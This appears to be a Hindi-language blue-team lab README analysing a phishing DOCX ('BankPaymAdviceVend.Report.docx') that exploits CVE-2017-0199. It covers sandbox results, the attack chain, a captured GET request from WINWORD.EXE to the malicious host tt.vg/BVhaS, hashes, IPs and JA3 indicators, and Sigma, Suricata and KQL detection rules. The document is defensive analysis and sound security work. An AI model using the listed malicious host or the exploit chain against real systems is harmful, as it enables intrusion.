
RCE-CVE-2017-0199-detection-analysis — Updated!
इस रिपॉजिटरी में CVE-2017-0199 का शोषण करने वाले एक वास्तविक दुर्भावनापूर्ण DOCX का पूर्ण ब्लू-टीम मैलवेयर विश्लेषण शामिल है। प्रयोगशाला में सैंडबॉक्स निष्पादन, नेटवर्क फोरेंसिक, IOC निष्कर्षण, MITRE ATT&CK मैपिंग, ड्रॉप की गई फाइलों की समीक्षा और डिटेक्शन नियम शामिल हैं। पेशेवर दस्तावेज़ीकरण के लिए साक्ष्य स्क्रीनशॉट evidence फ़ोल्डर के अंदर शामिल हैं।
🛡️ BankPaymAdviceVend.Report.docx CVE-2017-0199 – संपूर्ण ब्लू टीम सैंडबॉक्स विश्लेषण
उन्नत मैलवेयर डेटोनेशन • एक्सप्लॉइट व्यवहार • IOC • डिटेक्शन इंजीनियरिंग
🎯 1. कार्यकारी सारांश
यह रिपॉजिटरी **CVE-2017-0199** Microsoft Office RCE कमजोरी का शोषण करने वाली एक **वास्तविक दुर्भावनापूर्ण DOCX** फ़ाइल का दस्तावेज़ीकरण करती है। इस सैंपल को **Windows 10 ANY.RUN सैंडबॉक्स** के अंदर डेटोनेट किया गया था, जिससे सामने आए:
✔ पूर्ण एक्सप्लॉइट श्रृंखला
✔ दुर्भावनापूर्ण डोमेन (tt.vg) पर नेटवर्क कॉलबैक
✔ ड्रॉप की गई फ़ाइलें और अस्थायी आर्टिफैक्ट
✔ JA3 फिंगरप्रिंट
✔ रजिस्ट्री गतिविधि
✔ WINWORD.EXE से HTTP/HTTPS बीकनिंग
✔ संपूर्ण ब्लू-टीम IOC और डिटेक्शन नियम
🔍 2. परिदृश्य पृष्ठभूमि
“BankPaymAdviceVend.Report.docx” शीर्षक वाला एक दस्तावेज़ फ़िशिंग ईमेल के माध्यम से प्राप्त हुआ था।
एक बार डेटोनेट होने पर, ANY.RUN ने तुरंत इसे दुर्भावनापूर्ण (Malicious) के रूप में चिह्नित किया और इसे निम्नलिखित से जोड़ा:
- CVE-2017-0199 Word RCE एक्सप्लॉइट
- WINWORD.EXE द्वारा गुप्त HTTP/HTTPS कनेक्शन बनाना
- दुर्भावनापूर्ण शॉर्ट डोमेन
tt.vgसे संपर्क करना - रिमोट पेलोड
/BVhaSको पुनर्प्राप्त करने का प्रयास
📄 3. सैंपल जानकारी
| फ़ील्ड | मान |
|---|---|
| फ़ाइल | BankPaymAdviceVend.Report.docx |
| निर्णय | दुर्भावनापूर्ण गतिविधि |
| टैग | cve-2017-0199, exploit |
| MD5 | 22EDED727467A9A26F3FD311A12A7E |
| SHA1 | 6738D1A969193459C7C7579956269D77FED8D26F |
| SHA256 | 2E1408013503C...3D6EAF9 |
| सैंडबॉक्स | Windows 10 Pro x64 |
| व्यवहार | एक्सप्लॉइट → नेटवर्क बीकनिंग → ड्रॉप की गई फ़ाइलें |
🧬 4. अटैक श्रृंखला (उच्च-स्तरीय आरेख)
[ दुर्भावनापूर्ण DOCX ] │ ▼ [ उपयोगकर्ता Word में खोलता है ] │ ▼ [ CVE-2017-0199 एक्सप्लॉइट ट्रिगर होता है ] │ ▼ [ WINWORD.EXE → tt.vg HTTP/HTTPS के माध्यम से ] │ ▼ [ रिमोट पथ: /BVhaS (GET / HEAD / OPTIONS) ] │ ▼ [ अस्थायी फ़ाइलें, EMF ऑब्जेक्ट, कैश फ़ाइलें ड्रॉप हुईं ] │ ▼ [ संभावित अगला चरण पेलोड — सर्वर ने 404 लौटाया ]
yaml Copy code
🌐 5. नेटवर्क व्यवहार
5.1 DNS अनुरोध
केवल एक डोमेन दुर्भावनापूर्ण था:
| डोमेन | प्रतिष्ठा |
|---|---|
| tt.vg | 🔴 दुर्भावनापूर्ण |
रिज़ॉल्व किए गए IP:
188.114.96.3 188.114.97.3 172.67.138.42 (TLS v1.2)
yaml Copy code
📡 5.2 HTTP/HTTPS बीकनिंग
Word ने फ़ेच करने का प्रयास किया:
GET /BVhaS HEAD /BVhaS OPTIONS / Host: tt.vg User-Agent: Microsoft Office / MSIE 7 spoof
yaml Copy code
विशिष्ट कैप्चर किया गया अनुरोध:
GET /BVhaS HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0...) Connection: Keep-Alive Host: tt.vg
arduino Copy code
सर्वर ने जवाब दिया:
HTTP/1.1 404 Not Found
yaml Copy code
📁 6. ड्रॉप की गई फ़ाइलें
उल्लेखनीय आर्टिफैक्ट
- कई
.tmpफ़ाइलें - Office
.gloxग्राफ़िक ऑब्जेक्ट - ब्राउज़र कैश में EMF इमेजें:
%LOCALAPPDATA%\INetCache\Content.MSO\*.emf - हाल के दस्तावेज़ का शॉर्टकट
.LNK index.datलॉग- Office प्रूफिंग डिक्शनरी में बदलाव
🔐 7. रजिस्ट्री और सिस्टम व्यवहार
Word ने एक्सेस किया:
HKCU\Software\Microsoft\Office\14.0... HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings... HKLM\System\ControlSet001\Services\Tcpip\Parameters\Interfaces...
yaml Copy code
✔ Office के लिए सामान्य
❌ एक्सप्लॉइट के साथ संयुक्त = स्पष्ट दुर्भावनापूर्ण व्यवहार
💣 8. एक्सप्लॉइट विश्लेषण — CVE-2017-0199
प्रकार: रिमोट कोड निष्पादन (Remote Code Execution)
ट्रिगर: दुर्भावनापूर्ण DOCX उपयोगकर्ता इंटरैक्शन के बिना रिमोट HTA लोड करता है
परिचय: Microsoft Word 2007–2016
प्रभाव: हमलावर मनमाना कोड निष्पादित करता है
यह सैंपल निम्न से रिमोट पेलोड लोड करने का प्रयास करता है:
yaml Copy code
🧩 9. IOC
🔥 9.1 नेटवर्क संकेतक
डोमेन: tt.vg
URL: http://tt.vg/BVhaS https://tt.vg/BVhaS
IP: 188.114.96.3 188.114.97.3 172.67.138.42
shell Copy code
🔐 9.2 JA3 SSL फिंगरप्रिंट
091f51a7a1c3a4504a224cc081ce9cee 46f5131e766d248db0248a86c494b71c 65005c9d9ae0f0ebeaf22c210571d482 ...
yaml Copy code
🔍 10. डिटेक्शन विचार (Sigma / Suricata / EDR)
यह अनुभाग BankPaymAdviceVend.Report.docx के तकनीकी विश्लेषण को व्यावहारिक, प्रोडक्शन-तैयार डिटेक्शन आर्टिफैक्ट में परिवर्तित करता है, जिन्हें SOC या ब्लू टीम तुरंत तैनात कर सकती है। इसमें Sigma नियम, Suricata IDS सिग्नेचर, और EDR हंटिंग क्वेरी शामिल हैं।
🧾 10.1 Sigma नियम — WINWORD → tt.vg
यह Sigma नियम Windows नेटवर्क लॉग में WINWORD.EXE द्वारा
संदिग्ध शॉर्ट डोमेन tt.vg की ओर शुरू किए गए किसी भी नेटवर्क कनेक्शन का पता लगाता है।
title: WINWORD Connecting To Suspicious Short Domain tt.vg
id: 0b2a5f3d-ttvg-word
status: experimental
logsource:
category: network_connection
product: windows
detection:
selection:
Image|endswith: '\WINWORD.EXE'
DestinationHostname: 'tt.vg'
condition: selection
level: high
tags:
- attack.command_and_control
- attack.t1071.001
- cve.2017-0199
💡 कोई भी पुराना Office सिस्टम जो WINWORD.EXE के माध्यम से tt.vg से संपर्क करता है,
उसे तत्काल जांच शुरू करनी चाहिए।
🌐 10.2 Suricata नियम — tt.vg पर HTTP GET /BVhaS
एक Suricata IDS नियम जो दुर्भावनापूर्ण डोमेन tt.vg पर
GET /BVhaS के लिए Office-उत्पन्न अनुरोध की पहचान करता है।
यह एक्सप्लॉइट के पेलोड पुनर्प्राप्ति प्रयास को पकड़ता है।
alert http $HOME_NET any -> $EXTERNAL_NET any (
msg:"C2 – Office WINWORD GET /BVhaS on tt.vg";
flow:established,to_server;
http.method; content:"GET";
http.uri; content:"/BVhaS"; nocase;
http.host; content:"tt.vg"; nocase;
http.user_agent; content:"MSOffice"; nocase;
reference:cve,2017-0199;
classtype:trojan-activity;
sid:4200010;
rev:1;
)
🔥 बाहरी ट्रैफ़िक की निगरानी के लिए Suricata या Zeek का उपयोग करने वाले वातावरणों में अत्यधिक प्रभावी।
🛰️ 10.3 EDR हंटिंग क्वेरी — WINWORD + tt.vg संकेतक
एक KQL (Microsoft Defender) हंटिंग क्वेरी जिसका उपयोग वातावरण में किसी भी मशीन की पहचान करने के लिए किया जाता है
जो tt.vg या उससे संबंधित IP पतों पर समान दुर्भावनापूर्ण बीकनिंग दिखाती है।
DeviceNetworkEvents
| where InitiatingProcessFileName == "WINWORD.EXE"
| where RemoteUrl in ("tt.vg")
or RemoteIp in ("188.114.96.3","188.114.97.3","172.67.138.42")
🎯 उद्देश्य: एकल सैंडबॉक्स डेटोनेशन को पूर्ण एंटरप्राइज़-व्यापी हंट में विस्तारित करना।
🧩 11. यह लैब क्या प्रदर्शित करती है
यह लैब वास्तविक दुनिया के फ़िशिंग DOCX सैंपल का अंत-से-अंत (end-to-end) विश्लेषण करने की आपकी क्षमता को प्रदर्शित करती है, जो एक संपूर्ण SOC-ग्रेड पद्धति का पालन करती है:
- यह समझना कि CVE-2017-0199 Microsoft Word के अंदर कैसे ट्रिगर होता है।
- यह ट्रैक करना कि
WINWORD.EXEकैसे एक अप्रत्याशित HTTP/S क्लाइंट बन जाता है। - नेटवर्क IOC (डोमेन, URL, IP, JA3 TLS हैश) निकालना।
- फोरेंसिक मूल्य के लिए ड्रॉप की गई फ़ाइलों, हाल के शॉर्टकट्स, और रजिस्ट्री एक्सेस का विश्लेषण करना।
- सभी निष्कर्षों को Sigma, Suricata, और EDR हंटिंग क्वेरी में बदलना।
दूसरे शब्दों में — यह लैब डेटोनेशन पर नहीं रुकती। यह एक पेशेवर SOC विश्लेषक की तरह वास्तविक, कार्रवाई योग्य डिटेक्शन इंटेलिजेंस निकालती है।
अहमद तारिक द्वारा डिज़ाइन और दस्तावेज़ीकृत — ब्लू टीम